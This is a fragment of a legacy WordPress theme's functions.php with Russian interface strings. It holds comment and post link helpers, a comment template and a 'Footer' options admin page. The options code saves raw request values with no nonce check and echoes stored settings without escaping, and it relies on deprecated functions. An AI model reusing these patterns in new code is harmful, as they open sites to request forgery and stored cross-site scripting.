	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
